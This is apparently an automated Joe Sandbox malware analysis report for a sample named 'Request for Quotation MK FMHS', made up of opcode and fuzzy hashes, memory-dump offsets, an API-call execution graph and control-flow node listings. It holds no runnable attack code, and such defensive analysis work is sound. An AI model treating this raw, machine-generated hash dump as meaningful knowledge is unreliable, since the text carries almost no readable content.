                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2eef00760ad123303704f9ae8fc604c8c2ba57ce9dcaac49d553c6b94f3ea68
                                                                                                                        • Instruction ID: 5bb32634ada70926703b1dbac05de45460f219f1bccec7c75be324f4ff260471
                                                                                                                        • Opcode Fuzzy Hash: e2eef00760ad123303704f9ae8fc604c8c2ba57ce9dcaac49d553c6b94f3ea68
                                                                                                                        • Instruction Fuzzy Hash: 02110AB0D012099FEB15EFB9D940B9EBBF2FB45300F1085BAC514AB255EB745E059F82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3826240209.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_130d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                                                        • Instruction ID: 469831781916f01d91a982a8c3292143f30298eb673a3ab8c3760b886d833e46
                                                                                                                        • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                                                        • Instruction Fuzzy Hash: 7411D075504244CFCB16CF94D9D4B15BFA1FB44318F24C6A9D8494B692C33AD44ACF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 743957bab238a78a7ba426d768724cfec292de060d59330c98623ab4609d65d4
                                                                                                                        • Instruction ID: 60e3e99716c4f60514cdc706791d360c9326f6ec999835b7d55cc6f20283b763
                                                                                                                        • Opcode Fuzzy Hash: 743957bab238a78a7ba426d768724cfec292de060d59330c98623ab4609d65d4
                                                                                                                        • Instruction Fuzzy Hash: A601D8327002196BCB65DE589C10AEF3BABEBD8250F14802DF905D7284DF718D129B94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703063892dceb0d470bb83d8a942f653ca9528f33863f49b55d63ea593286cc7
                                                                                                                        • Instruction ID: 4a6cbf6ac1ab6cf8bcf0eeb83a3c04ed5dc2ce65a6b192f4d1db8add86b0509d
                                                                                                                        • Opcode Fuzzy Hash: 703063892dceb0d470bb83d8a942f653ca9528f33863f49b55d63ea593286cc7
                                                                                                                        • Instruction Fuzzy Hash: 96F0F635300A204B97269A6EDC54A2ABBDEEFC8A513095079F909C7765EFA1CC03CB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fd683a953b06923c58f35375c1d08b9c29dee3568c641905ab36cf3e6f12ec03
                                                                                                                        • Instruction ID: 9f7c2f1105d111cd60c2960c611d96428781c6338bb86872872683071bb98999
                                                                                                                        • Opcode Fuzzy Hash: fd683a953b06923c58f35375c1d08b9c29dee3568c641905ab36cf3e6f12ec03
                                                                                                                        • Instruction Fuzzy Hash: 50014C74E0120AEFDB01DFA8D840AAEBBB5FB49301F108076D914A3350D7795A59CF91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8e92f5494d66c8072a81c9805a19c8031becaeb6bada25df3502caa8b29645b4
                                                                                                                        • Instruction ID: 9095a27d6077ba3a515d4e3322e21e2afdeae37061acbe75035f41f11d790ff9
                                                                                                                        • Opcode Fuzzy Hash: 8e92f5494d66c8072a81c9805a19c8031becaeb6bada25df3502caa8b29645b4
                                                                                                                        • Instruction Fuzzy Hash: 3DF08232A00228AFCB00DF69DC04AEABBE9EBC8324F00C026E90887214D7314911CF90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dcca7223da4472c60a5b133416442a4cca4c394c928a6ea8fd5d0ecfb5802c6b
                                                                                                                        • Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
                                                                                                                        • Opcode Fuzzy Hash: dcca7223da4472c60a5b133416442a4cca4c394c928a6ea8fd5d0ecfb5802c6b
                                                                                                                        • Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4bdf016d6beb638a3172ea5a765a6624ba6268cd553c94c264690921cf25270
                                                                                                                        • Instruction ID: cc2a6c0aa79c0e2ef58604c1dff39a94483ce7321322aa33e1e590d78a9eed43
                                                                                                                        • Opcode Fuzzy Hash: a4bdf016d6beb638a3172ea5a765a6624ba6268cd553c94c264690921cf25270
                                                                                                                        • Instruction Fuzzy Hash: D6D01235D20226C6DB10EBB5DC440EEBB34AE95221B548626D52537550FB30165986E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                        • Instruction ID: 5a363ac12937444952c4f8ecfcb79d68dad4924352134a03a320d52818e84375
                                                                                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                        • Instruction Fuzzy Hash: E5C0127320C5382AA225104E7C40EA3AB8DC2C12F4A210137FA1C93241A8429C8141A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ca7105a2af78e3b51c4699484a61389ad1af3037353e6168cfa5964880cb58fb
                                                                                                                        • Instruction ID: 6b3d2bdcefd07d36f074faffcda4f4eeb1cab23a44ab881fc2f0dd46e242fff6
                                                                                                                        • Opcode Fuzzy Hash: ca7105a2af78e3b51c4699484a61389ad1af3037353e6168cfa5964880cb58fb
                                                                                                                        • Instruction Fuzzy Hash: 6ED05E300013064BE742FB31EC08656776AEB90214F648564D8051A55AEFBD5C568F51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4f4026be0f5c966f424719ef02a079f0c946fd61c78f2e28a5ed2d41c5ec94b4
                                                                                                                        • Instruction ID: 2b121a5d7a0a9e6e2fa84e4bf4558ce6d7f90ebc2a4a87e4af4bb4c9fe8cd0fd
                                                                                                                        • Opcode Fuzzy Hash: 4f4026be0f5c966f424719ef02a079f0c946fd61c78f2e28a5ed2d41c5ec94b4
                                                                                                                        • Instruction Fuzzy Hash: 39D04235E04619CBCB30DFE8E8844DCBB71EB49221F14652AD926A3651D73054658F51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e4e7cdabb4e3ebf5d9dd0c05995f0cf9165c6fe8b986fb3b3e0a8a7698954700
                                                                                                                        • Instruction ID: 51cea409319611ca1682464cca451bdeccb538ac72879f7c709fd871c5a1da0d
                                                                                                                        • Opcode Fuzzy Hash: e4e7cdabb4e3ebf5d9dd0c05995f0cf9165c6fe8b986fb3b3e0a8a7698954700
                                                                                                                        • Instruction Fuzzy Hash: ABD0673BB00108EFDB14DF98EC409DDF776FB98221B048116E915A3264C6319965DB54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 23400c46bcc4e1c2e05c591a7d0e1835e077251384622898aa0932a72c8f262d
                                                                                                                        • Instruction ID: 1cdf8c55e669af83b9372beca0d81b72b342212d3985946e1ae8dc1ccb3a6606
                                                                                                                        • Opcode Fuzzy Hash: 23400c46bcc4e1c2e05c591a7d0e1835e077251384622898aa0932a72c8f262d
                                                                                                                        • Instruction Fuzzy Hash: D8C08C300003094BE701FB71FC4896A332FFAD0100F449A30E9091A64EEFBDACAA8F91

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:7.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:73
                                                                                                                        Total number of Limit Nodes:5
                                                                                                                        execution_graph 26227 111d5f0 DuplicateHandle 26228 111d686 26227->26228 26229 111cfa0 26230 111cfe6 GetCurrentProcess 26229->26230 26232 111d031 26230->26232 26233 111d038 GetCurrentThread 26230->26233 26232->26233 26234 111d075 GetCurrentProcess 26233->26234 26235 111d06e 26233->26235 26236 111d0ab 26234->26236 26235->26234 26237 111d0d3 GetCurrentThreadId 26236->26237 26238 111d104 26237->26238 26239 1114668 26240 1114672 26239->26240 26244 1114758 26239->26244 26249 1113e34 26240->26249 26242 111468d 26245 111477d 26244->26245 26253 1114858 26245->26253 26257 1114868 26245->26257 26250 1113e3f 26249->26250 26265 1115c24 26250->26265 26252 1116faf 26252->26242 26254 111488f 26253->26254 26256 111496c 26254->26256 26261 11144b4 26254->26261 26259 111488f 26257->26259 26258 111496c 26258->26258 26259->26258 26260 11144b4 CreateActCtxA 26259->26260 26260->26258 26262 11158f8 CreateActCtxA 26261->26262 26264 11159bb 26262->26264 26266 1115c2f 26265->26266 26269 1115c44 26266->26269 26268 1117055 26268->26252 26270 1115c4f 26269->26270 26273 1115c74 26270->26273 26272 111713a 26272->26268 26274 1115c7f 26273->26274 26277 1115ca4 26274->26277 26276 111722d 26276->26272 26279 1115caf 26277->26279 26278 111823e 26279->26278 26281 111852b 26279->26281 26284 111abda 26279->26284 26280 1118569 26280->26276 26281->26280 26288 111ccc8 26281->26288 26293 111ac10 26284->26293 26296 111ac00 26284->26296 26285 111abee 26285->26281 26289 111ccf9 26288->26289 26290 111cd1d 26289->26290 26305 111ce77 26289->26305 26309 111ce88 26289->26309 26290->26280 26300 111ad08 26293->26300 26294 111ac1f 26294->26285 26297 111ac10 26296->26297 26299 111ad08 GetModuleHandleW 26297->26299 26298 111ac1f 26298->26285 26299->26298 26301 111ad3c 26300->26301 26302 111ad19 26300->26302 26301->26294 26302->26301 26303 111af40 GetModuleHandleW 26302->26303 26304 111af6d 26303->26304 26304->26294 26307 111ce95 26305->26307 26306 111cecf 26306->26290 26307->26306 26313 111ba40 26307->26313 26311 111ce95 26309->26311 26310 111cecf 26310->26290 26311->26310 26312 111ba40 GetModuleHandleW 26311->26312 26312->26310 26314 111ba4b 26313->26314 26316 111dbe8 26314->26316 26317 111d23c 26314->26317 26316->26316 26318 111d247 26317->26318 26319 1115ca4 GetModuleHandleW 26318->26319 26320 111dc57 26319->26320 26320->26316

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 44 53d9360-53d9388 45 53d938f-53d944b 44->45 46 53d938a 44->46 49 53d944d-53d9473 45->49 50 53d9450-53d945d 45->50 46->45 52 53d9479-53d94a3 49->52 53 53d9963-53d99a5 49->53 50->49 56 53d94a9-53d94c1 52->56 57 53d9b70-53d9b7c 52->57 62 53d99a8-53d99ac 53->62 58 53d94c7-53d94c8 56->58 59 53d9b82-53d9b8b 56->59 57->59 61 53d9b56-53d9b62 58->61 63 53d9b91-53d9b9d 59->63 64 53d94cd-53d94d9 61->64 65 53d9b68-53d9b6f 61->65 66 53d957e-53d9582 62->66 67 53d99b2-53d99b8 62->67 76 53d9ba3-53d9baf 63->76 70 53d94db 64->70 71 53d94e0-53d94fb 64->71 68 53d9594-53d959a 66->68 69 53d9584-53d9592 66->69 67->53 72 53d99ba-53d9a15 67->72 74 53d95df-53d95e3 68->74 73 53d95f2-53d9624 69->73 70->71 71->63 75 53d9501-53d9526 71->75 91 53d9a4c-53d9a76 72->91 92 53d9a17-53d9a4a 72->92 97 53d964e 73->97 98 53d9626-53d9632 73->98 77 53d959c-53d95a8 74->77 78 53d95e5 74->78 75->76 89 53d952c-53d952e 75->89 84 53d9bb5-53d9bbc 76->84 81 53d95af-53d95b7 77->81 82 53d95aa 77->82 85 53d95e8-53d95ec 78->85 87 53d95dc 81->87 88 53d95b9-53d95cd 81->88 82->81 85->73 90 53d9564-53d957b 85->90 87->74 94 53d9531-53d953c 88->94 95 53d95d3-53d95da 88->95 89->94 90->66 105 53d9a7f-53d9afe 91->105 92->105 94->84 99 53d9542-53d955f 94->99 95->78 104 53d9654-53d9681 97->104 101 53d963c-53d9642 98->101 102 53d9634-53d963a 98->102 99->85 106 53d964c 101->106 102->106 111 53d96d0-53d9763 104->111 112 53d9683-53d96bb 104->112 119 53d9b05-53d9b18 105->119 106->104 127 53d976c-53d976d 111->127 128 53d9765 111->128 120 53d9b27-53d9b2c 112->120 119->120 121 53d9b2e-53d9b3c 120->121 122 53d9b43-53d9b53 120->122 121->122 122->61 129 53d97be-53d97c4 127->129 128->127 130 53d976f-53d978e 129->130 131 53d97c6-53d9888 129->131 132 53d9795-53d97bb 130->132 133 53d9790 130->133 142 53d98c9-53d98cd 131->142 143 53d988a-53d98c3 131->143 132->129 133->132 144 53d98cf-53d9908 142->144 145 53d990e-53d9912 142->145 143->142 144->145 146 53d9914-53d994d 145->146 147 53d9953-53d9957 145->147 146->147 147->72 149 53d9959-53d9961 147->149 149->62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1472538101.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_53d0000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: :$~
                                                                                                                        • API String ID: 0-2431124681
                                                                                                                        • Opcode ID: b5df7c6a91fb71059ab702dc5799476ca4a090f0a5185250af12884b06983ef4
                                                                                                                        • Instruction ID: c77f0d53753890b827f345bd4e88ef7bbe5b8d6329550c6595fa9d506c9cfbb4
                                                                                                                        • Opcode Fuzzy Hash: b5df7c6a91fb71059ab702dc5799476ca4a090f0a5185250af12884b06983ef4
                                                                                                                        • Instruction Fuzzy Hash: 7A42D276A00228DFDB15CFA9D984FA9BBB2FF48304F1580E9E509AB261D7319D91DF10

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 152 53d7fae-53d7fb2 153 53d8975-53d8983 152->153 154 53d7fb3-53d7fc8 152->154 154->153 155 53d7fc9-53d7fd4 154->155 157 53d7fda-53d7fe6 155->157 159 53d7ff2-53d8001 157->159 161 53d8060-53d8064 159->161 162 53d810c-53d8176 161->162 163 53d806a-53d8073 161->163 162->153 202 53d817c-53d86c3 162->202 164 53d7f6e-53d7f7a 163->164 165 53d8079-53d808f 163->165 164->153 167 53d7f80-53d7f8c 164->167 173 53d80e1-53d80f3 165->173 174 53d8091-53d8094 165->174 168 53d7f8e-53d7fa2 167->168 169 53d8003-53d8009 167->169 168->169 179 53d7fa4-53d7fad 168->179 169->153 171 53d800f-53d8027 169->171 171->153 182 53d802d-53d8055 171->182 183 53d80f9-53d80fc 173->183 184 53d88b4-53d896a 173->184 174->153 176 53d809a-53d80d7 174->176 176->162 197 53d80d9-53d80df 176->197 179->152 182->161 186 53d80ff-53d8109 183->186 184->153 197->173 197->174 279 53d86da-53d876d 202->279 280 53d86c5-53d86cf 202->280 281 53d8778-53d880b 279->281 280->281 282 53d86d5 280->282 283 53d8816-53d88a9 281->283 282->283 283->184
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1472538101.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_53d0000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        • Opcode ID: dcb89adbd8329d8ff100efea099456adc8ba21885326b215f380b7b72ecb4a7d
                                                                                                                        • Instruction ID: d794224f6d522c35b6cae1db38b46c36ab2c8b1b53165c76e5d1323daa730e91
                                                                                                                        • Opcode Fuzzy Hash: dcb89adbd8329d8ff100efea099456adc8ba21885326b215f380b7b72ecb4a7d
                                                                                                                        • Instruction Fuzzy Hash: BD52C674A002289FDB64DF64D898B9DB7B6FF89310F1085D9D50AAB364CB34AE81CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1472538101.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_53d0000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 983bd0a42fe041becefef5706c444b3398d1700ecd5d58118c85a6016e14c7c2
                                                                                                                        • Instruction ID: 2d05dced7e31b02b01073d0ef6af33a3c677ca3033b8a70cbccf96d849b9013f
                                                                                                                        • Opcode Fuzzy Hash: 983bd0a42fe041becefef5706c444b3398d1700ecd5d58118c85a6016e14c7c2
                                                                                                                        • Instruction Fuzzy Hash: 85529136B00115DFDB05DF69E884A6DBBB2BF88350F158169E816EB360DB71EC41CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0111D01E
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0111D05B
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0111D098
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0111D0F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1467956566.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_1110000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: 5dd1996c170424cf3a3719d14f7fd0f315f6cb2c636dbdb5084d341fca6523bb
                                                                                                                        • Instruction ID: 0e422c611fec17c6db7c8267d9c0fc2d7226e6769ae5e2c21867257fa6f5e620
                                                                                                                        • Opcode Fuzzy Hash: 5dd1996c170424cf3a3719d14f7fd0f315f6cb2c636dbdb5084d341fca6523bb
                                                                                                                        • Instruction Fuzzy Hash: 2E5169B09017498FEB18CFA9D648B9EFBF1EF89304F208459D019B7350D7759945CB26

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0111D01E
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0111D05B
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0111D098
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0111D0F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1467956566.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_1110000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: 92d39fe9eb60041ea4fc48198323c602bec2bfa4905a905600ca23552317ef4f
                                                                                                                        • Instruction ID: 7a843eebd82038d98c76e91046569b25108743a82aba123d2b1dcf745c3504a3
                                                                                                                        • Opcode Fuzzy Hash: 92d39fe9eb60041ea4fc48198323c602bec2bfa4905a905600ca23552317ef4f
                                                                                                                        • Instruction Fuzzy Hash: B45158B09017498FEB18CFAAD548B9EFBF1EF88344F208459D019A7350D7759944CB65

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 308 111ad08-111ad17 309 111ad43-111ad47 308->309 310 111ad19-111ad26 call 111a02c 308->310 312 111ad49-111ad53 309->312 313 111ad5b-111ad9c 309->313 316 111ad28 310->316 317 111ad3c 310->317 312->313 319 111ada9-111adb7 313->319 320 111ad9e-111ada6 313->320 367 111ad2e call 111af90 316->367 368 111ad2e call 111afa0 316->368 317->309 321 111adb9-111adbe 319->321 322 111addb-111addd 319->322 320->319 324 111adc0-111adc7 call 111a038 321->324 325 111adc9 321->325 327 111ade0-111ade7 322->327 323 111ad34-111ad36 323->317 326 111ae78-111aef4 323->326 329 111adcb-111add9 324->329 325->329 358 111af20-111af38 326->358 359 111aef6-111af1e 326->359 330 111adf4-111adfb 327->330 331 111ade9-111adf1 327->331 329->327 334 111ae08-111ae11 call 111a048 330->334 335 111adfd-111ae05 330->335 331->330 339 111ae13-111ae1b 334->339 340 111ae1e-111ae23 334->340 335->334 339->340 341 111ae41-111ae45 340->341 342 111ae25-111ae2c 340->342 365 111ae48 call 111b270 341->365 366 111ae48 call 111b2a0 341->366 342->341 344 111ae2e-111ae3e call 111a058 call 111a068 342->344 344->341 347 111ae4b-111ae4e 349 111ae71-111ae77 347->349 350 111ae50-111ae6e 347->350 350->349 360 111af40-111af6b GetModuleHandleW 358->360 361 111af3a-111af3d 358->361 359->358 362 111af74-111af88 360->362 363 111af6d-111af73 360->363 361->360 363->362 365->347 366->347 367->323 368->323
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0111AF5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1467956566.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_1110000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: c1bb4acdbef7eb0e624292a6dd45c45f9b72d799d926a713f0107fe67fe75972
                                                                                                                        • Instruction ID: f7c29e62e0cee6e17ab04f9bd7b0669dc7c56bdd2d87ff9ac9f786e891c0cb0a
                                                                                                                        • Opcode Fuzzy Hash: c1bb4acdbef7eb0e624292a6dd45c45f9b72d799d926a713f0107fe67fe75972
                                                                                                                        • Instruction Fuzzy Hash: B48145B0A01B458FEB28DF29E04475ABBF1FF48304F008A2ED48AD7A55D775E949CB91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 369 11158ec-111596c 370 111596f-11159b9 CreateActCtxA 369->370 372 11159c2-1115a1c 370->372 373 11159bb-11159c1 370->373 380 1115a2b-1115a2f 372->380 381 1115a1e-1115a21 372->381 373->372 382 1115a31-1115a3d 380->382 383 1115a40 380->383 381->380 382->383 385 1115a41 383->385 385->385
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 011159A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1467956566.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_1110000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: 6b6497500a55b20a35554f1c841de8c4ade91e06fcebd7520cd13b6ac0e90195
                                                                                                                        • Instruction ID: 2632cf8fddfa8b4e26261d5b48c4b007536cd4850c3432046c15a361972ef921
                                                                                                                        • Opcode Fuzzy Hash: 6b6497500a55b20a35554f1c841de8c4ade91e06fcebd7520cd13b6ac0e90195
                                                                                                                        • Instruction Fuzzy Hash: ED41CF71C007598BEB24CFA9C8847DEFBB6AF8A304F20806AD449AB255DB756946CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 386 11144b4-11159b9 CreateActCtxA 390 11159c2-1115a1c 386->390 391 11159bb-11159c1 386->391 398 1115a2b-1115a2f 390->398 399 1115a1e-1115a21 390->399 391->390 400 1115a31-1115a3d 398->400 401 1115a40 398->401 399->398 400->401 403 1115a41 401->403 403->403
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 011159A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000A.00000002.1467956566.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_10_2_1110000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: 72346b25224bb667885f4cc92ce483cb79bb5f396943b1d01e93e38dd4dc38e0
                                                                                                                        • Instruction ID: 725e6397049cace6d10b3c00a6ff7e0725e4b598f8b2ef48673b07c776c24bec
                                                                                                                        • Opcode Fuzzy Hash: 72346b25224bb667885f4cc92ce483cb79bb5f396943b1d01e93e38dd4dc38e0
                                                                                                                        • Instruction Fuzzy Hash: 2C41D371C0071DCBEB24CFAAC84479EFBB6BF89304F20806AD509AB255DB755945CF91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 404 1115a64-1115a6f 406 1115ae9-1115b13 404->406
                                                                                                                        Memory Dump Source
